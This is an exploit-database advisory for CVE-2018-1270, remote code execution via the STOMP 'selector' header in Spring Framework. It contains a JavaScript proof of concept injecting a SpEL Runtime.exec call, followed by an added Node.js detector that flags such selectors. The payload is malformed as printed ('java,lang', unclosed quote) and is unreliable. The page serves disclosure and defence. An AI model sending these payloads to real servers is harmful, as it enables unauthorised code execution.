Pivotal Spring Java Framework < 5.0 Remote Code Execution

2018.05.30
Credit: JameelNabbo
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-358


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Pivotal Spring Java Framework < 5.0 - Remote Code Execution
# Date: 2018-05-28
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com <http://jameelnabbo.com/>
# Vendor Homepage:
# https://pivotal.io/agile/press-release/pivotal-releases-spring-framework-for-modern-java-application-development
# CVE: CVE-2018-1270
# Version: <= 5.0.x
# Description: By connecting to Spring STOMP and putting the key for the "selector"
# header, we can execute code on Spring.

# POC:
# Here we are writing Java commands to be executed within the selector header
# Connecting to a web socket using SockJS
# Ref: https://docs.spring.io/spring/docs/current/spring-framework-reference/web.html#websocket-stomp-enable

var header = {"selector":"T(java,lang.Runtime).getRuntime().exec('open -a Calculator"};
var socket = new SockJS('/gs-guide-websocket');
var stompClient = webstomp.over(socket);
stompClient.connect({}, function (frame){
    setConnected(true);
    console.log('Connected: ' + frame);
    stompClient.subscribe('/topic/greetings', function(greeting){
        showGreeting(JSON.parse(greeting.body).content);
    },header);
});
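Detection-side companion to the PoC above, added here and not part of the original advisory or of Spring: a Node.js example that parses raw STOMP frames and flags SUBSCRIBE frames whose "selector" header contains SpEL type references, constructors or method calls. It assumes the frames have already been extracted from the SockJS/WebSocket transport; the function names, the pattern list and the sample frames are constructed for illustration.

```javascript
// Added example (not from the advisory): flag STOMP SUBSCRIBE frames whose
// "selector" header contains SpEL constructs a message filter should not need.

// Assumed pattern list for illustration; not exhaustive.
const SUSPICIOUS = [
  { name: 'type-reference', re: /\bT\s*\(/ },
  { name: 'constructor', re: /\bnew\s+[A-Za-z_]/ },
  { name: 'method-call', re: /\.\s*[A-Za-z_]\w*\s*\(/ },
];

// Undo STOMP header escaping (\n, \r, \c for colon, \\) so escapes cannot hide a match.
function unescapeHeader(s) {
  const map = { n: '\n', r: '\r', c: ':', '\\': '\\' };
  return s.replace(/\\(.)/g, (m, ch) => map[ch] ?? m);
}

// Parse one raw STOMP frame (command, header lines, blank line, body, NUL).
function parseFrame(raw) {
  const head = raw.replace(/\0[\s\S]*$/, '').split(/\r?\n\r?\n/)[0];
  const [command, ...lines] = head.split(/\r?\n/);
  const headers = new Map();
  for (const line of lines) {
    const i = line.indexOf(':');
    if (i < 1) continue;
    const key = unescapeHeader(line.slice(0, i));
    // When a header repeats, STOMP says the first occurrence wins.
    if (!headers.has(key)) headers.set(key, unescapeHeader(line.slice(i + 1)));
  }
  return { command: command.trim(), headers };
}

// Returns null for frames without a selector, otherwise a finding object.
function inspectFrame(raw) {
  const { command, headers } = parseFrame(raw);
  if (command !== 'SUBSCRIBE' || !headers.has('selector')) return null;
  const selector = headers.get('selector');
  const hits = SUSPICIOUS.filter((p) => p.re.test(selector)).map((p) => p.name);
  const verdict = hits.length ? 'alert' : 'review';
  return { destination: headers.get('destination') ?? null, selector, hits, verdict };
}

// Constructed frames: no selector, a plain comparison, and the advisory's header value.
const SAMPLES = [
  'SUBSCRIBE\nid:sub-0\ndestination:/topic/greetings\n\n\0',
  "SUBSCRIBE\nid:sub-1\ndestination:/topic/greetings\nselector:headers.priority == 'high'\n\n\0",
  "SUBSCRIBE\nid:sub-2\ndestination:/topic/greetings\nselector:" +
    "T(java,lang.Runtime).getRuntime().exec('open -a Calculator\n\n\0",
];
for (const frame of SAMPLES) console.log(inspectFrame(frame));
```

Where an application's own clients never send a selector header, the 'review' verdict is itself worth logging, since any selector on a SUBSCRIBE frame is then unexpected.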


Copyright 2018, cxsecurity.com

 
